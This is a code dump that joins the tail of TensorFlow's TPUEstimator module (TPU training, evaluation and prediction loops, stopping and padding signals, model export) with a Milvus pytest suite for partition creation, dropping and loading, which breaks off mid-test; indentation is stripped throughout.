# directly and yield the element (via generator) to call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoid the issue we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if "host_call" not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret["host_call"]
predictions = host_call_ret["predictions"]
_verify_cross_hosts_transfer_size(
predictions,
message=(
"The estimated size for TPUEstimatorSpec.predictions is too "
"large."
),
)
signals = host_call_ret["signals"]
with ops.control_dependencies(host_ops):
host_ops = [] # Empty, we do do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals
)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals
)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx, enqueue_ops, host_ops, rendezvous=self._rendezvous[mode]
),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold,
)
return _model_fn
def _is_tpu_tensor(tensor):
if not isinstance(tensor, ops.Tensor):
return False
try:
tensor.op.get_attr(
tpu._OUTSIDE_COMPILATION_ATTR
) # pylint: disable=protected-access
except ValueError:
return True
else:
return False
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output.outputs.values()
else:
raise ValueError(
"`export_output` must be have type `ClassificationOutput`, "
"`RegressionOutput`, or `PredictOutput`; got {}.".format(export_output)
)
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError(
"tensors must be of length 2; " "got {}.".format(len(tensors))
)
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError(
"tensors must be of length 1; " "got {}".format(len(tensors))
)
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors))
)
else:
raise ValueError(
"`export_output` must be have type `ClassificationOutput`, "
"`RegressionOutput`, or `PredictOutput`; got {}.".format(export_output)
)
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(
single_tpu_eval_step,
host_calls,
captured_scaffold_fn,
captured_eval_hooks,
) = model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)
def multi_tpu_eval_steps_on_single_shard():
loop_vars = [_ZERO_LOSS]
if model_fn_wrapper._eval_cache_fn is not None:
batch_size = ctx.global_batch_size
num_shards = ctx._config._tpu_config.num_shards
loop_vars += model_fn_wrapper._eval_cache_fn(batch_size // num_shards)
return training_loop.repeat(
iterations_per_loop_var, single_tpu_eval_step, loop_vars
)
ret = tpu.shard(
multi_tpu_eval_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment,
)
loss = ret[0]
scaffold = _get_scaffold(captured_scaffold_fn)
return loss, host_calls, scaffold, captured_eval_hooks.get()
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(
single_tpu_train_step,
host_call,
captured_scaffold_fn,
captured_training_hooks,
) = model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn)
def multi_tpu_train_steps_on_single_shard():
if model_fn_wrapper._params.get("track_mean", False):
loop_vars = [_ZERO_LOSS]
else:
loop_vars = [_INITIAL_LOSS]
if model_fn_wrapper._train_cache_fn is not None:
batch_size = ctx.global_batch_size
num_shards = ctx._config._tpu_config.num_shards
loop_vars += model_fn_wrapper._train_cache_fn(batch_size // num_shards)
return training_loop.repeat(
iterations_per_loop_var, single_tpu_train_step, loop_vars
)
ret = tpu.shard(
multi_tpu_train_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment,
)
loss = ret[0]
scaffold = _get_scaffold(captured_scaffold_fn)
return loss, host_call, scaffold, captured_training_hooks.get()
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
(
single_tpu_predict_step,
host_calls,
captured_scaffold_fn,
captured_predict_hooks,
) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)
def multi_tpu_predict_steps_on_single_shard():
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal)
)
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b"loop"
)
return outputs
(dummy_predict_op,) = tpu.shard(
multi_tpu_predict_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment,
)
scaffold = _get_scaffold(captured_scaffold_fn)
return dummy_predict_op, host_calls, scaffold, captured_predict_hooks.get()
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation,
[constant_op.constant(0)],
parallel_iterations=1,
)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value["ops"]
signals = return_value["signals"]
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond, computation, [_StopSignals.NON_STOPPING_SIGNAL], parallel_iterations=1
)
def _validate_tpu_training_graph():
"""Validate graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
operations = ops.get_default_graph().get_operations()
# Check if there is atleast one CrossReplicaSum operation in the graph
# This should be introduced by using the CrossShardOptimizer wrapper
cross_replica_sum_ops = [o for o in operations if o.type == _CROSS_REPLICA_SUM_OP]
if not cross_replica_sum_ops:
raise ValueError("CrossShardOptimizer must be used for model training on TPUs.")
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
"InternalError: Object can capture only once. Please file bug."
)
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
"InternalError: Object is not captured properly before `get`. "
"Please file bug."
)
return self._object
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message="Inside scaffold_fn"):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
"TPUEstimatorSpec.scaffold_fn returns None, which is not allowed"
)
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext("Inside Scaffold.finalize"):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if (
tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr
): # pylint: disable=protected-access
raise ValueError(
"{}: Op {} depends on TPU computation {}, "
"which is not allowed.".format(self._message, op, c)
)
def to_control_flow_context_def(self, context_def, export_scope=None):
# pylint: disable=useless-super-delegation
# NOTE(slebedev): the method is required by `ControlFlowContext`.
super(_CapturingContext, self).to_control_flow_context_def(
context_def, export_scope
)
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (
features is not None or labels is not None or signals is not None
):
raise RuntimeError(
"Internal Error: Either (features and labels) or "
"dataset should be provided, not both. Please file "
"bug"
)
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.Dataset):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer_hook(self):
"""Returns a `SessionRunHook` to initialize this dataset.
This must be called before `features_and_labels`.
"""
iterator = self._dataset.make_initializable_iterator()
# pylint: disable=protected-access
hook = estimator_util._DatasetInitializerHook(iterator)
# pylint: enable=protected-access
self._iterator = iterator
return hook
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError(
"Internal error: Must call dataset_initializer_hook "
"before calling features_and_labels(). Please file "
"a bug!"
)
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(
self, dataset, batch_size, add_padding=False, num_invocations_per_step=1
):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding
)
)
if num_invocations_per_step == 1:
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding
)
)
else:
# We append (2 * num_invocations_per_step - 1) batches for exhausting the
# user_provided_dataset and stop properly.
# For example, if num_invocations_per_step is 2, we append 3 additional
# padding batches: b1, b2, b3.
# If user_provided_dataset contains two batches: a1, a2
# Step 1: [a1, a2]
# Step 2: [b1, b2] -> STOP
# If user_provided_dataset contains three batches: a1, a2, a3.
# The training loops:
# Step 1: [a1, a2]
# Step 2: [a3, b1]
# Step 3: [b2, b3] -> STOP.
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding
)
)
final_batch_dataset = final_batch_dataset.repeat(
2 * num_invocations_per_step - 1
)
def _set_mask(data_dict):
signals = data_dict["signals"]
signals["padding_mask"] = array_ops.ones_like(signals["padding_mask"])
data_dict["signals"] = signals
return data_dict
# Mask out the extra batch.
final_batch_dataset = final_batch_dataset.map(_set_mask)
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
"Internal Error: The previous inputs have not been properly "
"consumed. First call features_and_labels, then call signals."
)
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals["features"]
labels = inputs_with_signals.get("labels")
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
"Internal Error: The current inputs have not been properly "
"generated. First call features_and_labels, then call signals."
)
signals = self._current_inputs["signals"]
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary now and `features`, `labels`, and `signals` are three
distinguished keys in that dict. This provides a better structure, which
eases the process to decompose the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# for the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = _PaddingSignals.pad_features_and_labels(
features, labels, batch_size
)
new_input_dict["features"] = features
if labels is not None:
new_input_dict["labels"] = labels
else:
new_input_dict["features"] = features
if labels is not None:
new_input_dict["labels"] = labels
padding_mask = None
new_input_dict["signals"] = _StopSignals(
stop=stop, batch_size=batch_size, padding_mask=padding_mask
).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {"stopping": stopping}
if self._padding_mask is not None:
signals["padding_mask"] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals["stopping"][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
"""Detects whether scalar_stopping_signal indicates stopping."""
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return math_ops.logical_and(
scalar_stopping_signal, _StopSignals.STOPPING_SIGNAL
)
else:
# For non Tensor case, it is used in SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor,
real_batch_size,
data=(batch_size_tensor, real_batch_size),
message="The real batch size should not be greater than batch_size.",
)
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(
real_batch_size, missing_count, batch_size
)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals["padding_mask"]
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
# order is preserved. By that, the sliced padding mask should have all 0's.
# If this assertion failed, # the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0
)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals)
)
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)),
)
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [x for x in nest.flatten(batch_features) if isinstance(x, ops.Tensor)]
if not tensors:
raise ValueError("Cannot find any Tensor in features dict.")
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = array_ops.concat(
[
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32),
],
axis=0,
)
padding_mask.set_shape((batch_size,))
return padding_mask
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
"{} The transfer size is larger than the protobuf limit. Please "
"consider to use Tensors with smaller shapes or reduce batch "
"size. Given:\n"
"{}".format(
message,
"\n".join(
[
" -- Key: {}, Shape: {}".format(k, v)
for k, v in tensor_structure.items()
]
),
)
)
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if isinstance(params, hparam.HParams):
# For HParams, we need to use special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
def export_estimator_savedmodel(
estimator,
export_dir_base,
serving_input_receiver_fn,
assets_extra=None,
as_text=False,
checkpoint_path=None,
strip_default_attrs=False,
):
"""Export `Estimator` trained model for TPU inference.
Args:
estimator: `Estimator` with which model has been trained.
export_dir_base: A string containing a directory in which to create
timestamped subdirectories containing exported SavedModels.
serving_input_receiver_fn: A function that takes no argument and
returns a `ServingInputReceiver` or `TensorServingInputReceiver`.
assets_extra: A dict specifying how to populate the assets.extra directory
within the exported SavedModel, or `None` if no extra assets are needed.
as_text: whether to write the SavedModel proto in text format.
checkpoint_path: The checkpoint path to export. If `None` (the default),
the most recent checkpoint found within the model directory is chosen.
strip_default_attrs: Boolean. If `True`, default-valued attributes will be
removed from the NodeDefs.
Returns:
The string path to the exported directory.
"""
# `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
# `estimator.config`.
config = tpu_config.RunConfig(model_dir=estimator.model_dir)
est = TPUEstimator(
estimator._model_fn, # pylint: disable=protected-access
config=config,
params=estimator.params,
use_tpu=True,
train_batch_size=2048, # Does not matter.
eval_batch_size=2048, # Does not matter.
)
return est.export_savedmodel(
export_dir_base,
serving_input_receiver_fn,
assets_extra,
as_text,
checkpoint_path,
strip_default_attrs,
)
|
test_partition.py
|
from functools import reduce
from os import name
import threading
import pytest
from base.partition_wrapper import ApiPartitionWrapper
from base.client_base import TestcaseBase
from common import common_func as cf
from common import common_type as ct
from utils.util_log import test_log as log
from common.common_type import CaseLabel, CheckTasks
from common.code_mapping import PartitionErrorMessage
prefix = "partition_"
class TestPartitionParams(TestcaseBase):
""" Test case of partition interface in parameters"""
@pytest.mark.tags(CaseLabel.L0)
def test_partition_default(self):
"""
target: verify create a partition
method: create a partition
expected: create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
description = cf.gen_unique_str("desc_")
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
# check that the partition has been created
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("partition_name", [""])
def test_partition_empty_name(self, partition_name):
"""
target: verify create a partition with empty name
method: create a partition with empty name
expected: raise exception
"""
# create a collection
collection_w = self.init_collection_wrap()
# create partition
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "Partition name should not be empty"})
@pytest.mark.tags(CaseLabel.L2)
def test_partition_empty_description(self):
"""
target: verify create a partition with empty description
method: create a partition with empty description
expected: create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# init partition
partition_name = cf.gen_unique_str(prefix)
description = ""
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
# check that the partition has been created
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_partition_max_description_length(self):
"""
target: verify create a partition with 255 length name and 1024 length description
method: create a partition with 255 length name and 1024 length description
expected: create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# init partition
partition_name = cf.gen_str_by_length(255)
description = cf.gen_str_by_length(2048)
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True}
)
@pytest.mark.tags(CaseLabel.L1)
def test_partition_dup_name(self):
"""
target: verify create partitions with duplicate names
method: create partitions with duplicate names
expected: 1. create successfully
2. the same partition returned with diff object ids
"""
# create a collection
collection_w = self.init_collection_wrap()
# create two partitions
partition_name = cf.gen_unique_str(prefix)
description = cf.gen_unique_str()
partition_w1 = self.init_partition_wrap(collection_w, partition_name, description)
partition_w2 = self.init_partition_wrap(collection_w, partition_name, description)
# public check func to be extracted
assert id(partition_w1.partition) != id(partition_w2.partition)
assert partition_w1.name == partition_w2.name
assert partition_w1.description == partition_w2.description
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("description", ct.get_invalid_strs)
def test_partition_special_chars_description(self, description):
"""
target: verify create a partition with special characters in description
method: create a partition with special characters in description
expected: create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L0)
def test_partition_default_name(self):
"""
target: verify create a partition with default name
method: 1. get the _default partition
2. create a partition with _default name
expected: the same partition returned
"""
# create collection
collection_w = self.init_collection_wrap()
# check that the default partition exists
assert collection_w.has_partition(ct.default_partition_name)[0]
# check that can get the _default partition
collection, _ = collection_w.partition(ct.default_partition_name)
# check that init the _default partition object
partition_w = self.init_partition_wrap(collection_w, ct.default_partition_name)
assert collection.name == partition_w.name
@pytest.mark.tags(CaseLabel.L2)
def test_partition_max_length_name(self):
"""
target: verify create a partition with max length(256) name
method: create a partition with max length name
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_str_by_length(256)
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, 'err_msg': "is illegal"}
)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("partition_name", ct.get_invalid_strs)
def test_partition_invalid_name(self, partition_name):
"""
target: verify create a partition with invalid name
method: create a partition with invalid names
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, 'err_msg': "is illegal"}
)
# TODO: need an error code issue #5144 and assert independently
@pytest.mark.tags(CaseLabel.L2)
def test_partition_none_collection(self):
"""
target: verify create a partition with none collection
method: create a partition with none collection
expected: raise exception
"""
# create partition with collection is None
partition_name = cf.gen_unique_str(prefix)
self.partition_wrap.init_partition(collection=None, name=partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "must be pymilvus.Collection"})
@pytest.mark.tags(CaseLabel.L1)
def test_partition_drop(self):
"""
target: verify drop a partition in one collection
method: 1. create a partition in one collection
2. drop the partition
expected: drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
# check that the partition exists
assert collection_w.has_partition(partition_name)[0]
# drop partition
partition_w.drop()
# check that the partition not exists
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_load_partiton_respectively(self):
"""
target: test release the partition after load partition
method: load partition1 and load another partition
expected: raise exception
"""
self._connect()
collection_w = self.init_collection_wrap()
partition_w1 = self.init_partition_wrap(collection_w)
partition_w2 = self.init_partition_wrap(collection_w)
partition_w1.insert(cf.gen_default_list_data())
partition_w2.insert(cf.gen_default_list_data())
partition_w1.load()
error = {ct.err_code: 1, ct.err_msg: f'load the partition after load collection is not supported'}
partition_w2.load(check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_load_partitions_after_release(self):
"""
target: test release the partition after load partition
method: load partitions and release partitions
expected: no exception
"""
self._connect()
collection_w = self.init_collection_wrap()
partition_w1 = self.init_partition_wrap(collection_w, name="partition_w1")
partition_w2 = self.init_partition_wrap(collection_w, name="partition_w2")
partition_w1.insert(cf.gen_default_list_data())
partition_w2.insert(cf.gen_default_list_data())
partition_names = ["partition_w1", "partition_w2"]
collection_w.load(partition_names)
collection_w.release(partition_names)
@pytest.mark.tags(CaseLabel.L2)
def test_load_partition_after_load_partition(self):
"""
target: test release the partition after load partition
method: load partition1 and release the partition1
load partition2
expected: no exception
"""
self._connect()
collection_w = self.init_collection_wrap()
partition_w1 = self.init_partition_wrap(collection_w)
partition_w2 = self.init_partition_wrap(collection_w)
partition_w1.insert(cf.gen_default_list_data())
partition_w2.insert(cf.gen_default_list_data())
partition_w1.load()
partition_w1.release()
partition_w2.load()
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_non_number_replicas(self, request):
if request.param == 1:
pytest.skip("1 is valid replica number")
if request.param is None:
pytest.skip("None is valid replica number")
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_load_partition_replica_non_number(self, get_non_number_replicas):
"""
target: test load partition with non-number replicas
method: load with non-number replicas
expected: raise exceptions
"""
# create, insert
self._connect()
collection_w = self.init_collection_wrap()
partition_w = self.init_partition_wrap(collection_w)
partition_w.insert(cf.gen_default_list_data(nb=100))
# load with non-number replicas
error = {ct.err_code: 0, ct.err_msg: f"but expected one of: int, long"}
partition_w.load(replica_number=get_non_number_replicas, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("replicas", [0, -1, None])
def test_load_replica_invalid_number(self, replicas):
"""
target: test load partition with invalid replica number
method: load with invalid replica number
expected: raise exception
"""
# create, insert
self._connect()
collection_w = self.init_collection_wrap()
partition_w = self.init_partition_wrap(collection_w)
partition_w.insert(cf.gen_default_list_data())
assert partition_w.num_entities == ct.default_nb
partition_w.load(replica_number=replicas)
p_replicas = partition_w.get_replicas()[0]
assert len(p_replicas.groups) == 1
query_res, _ = partition_w.query(expr=f"{ct.default_int64_field_name} in [0]")
assert len(query_res) == 1
@pytest.mark.tags(CaseLabel.L2)
def test_load_replica_greater_than_querynodes(self):
"""
target: test load with replicas that greater than querynodes
method: load with 3 replicas (2 querynode)
expected: Verify load successfully and 1 available replica
"""
# create, insert
self._connect()
collection_w = self.init_collection_wrap()
partition_w = self.init_partition_wrap(collection_w)
partition_w.insert(cf.gen_default_list_data())
assert partition_w.num_entities == ct.default_nb
# load with 2 replicas
error = {ct.err_code: 1, ct.err_msg: f"no enough nodes to create replicas"}
partition_w.load(replica_number=3, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.ClusterOnly)
def test_load_replica_change(self):
"""
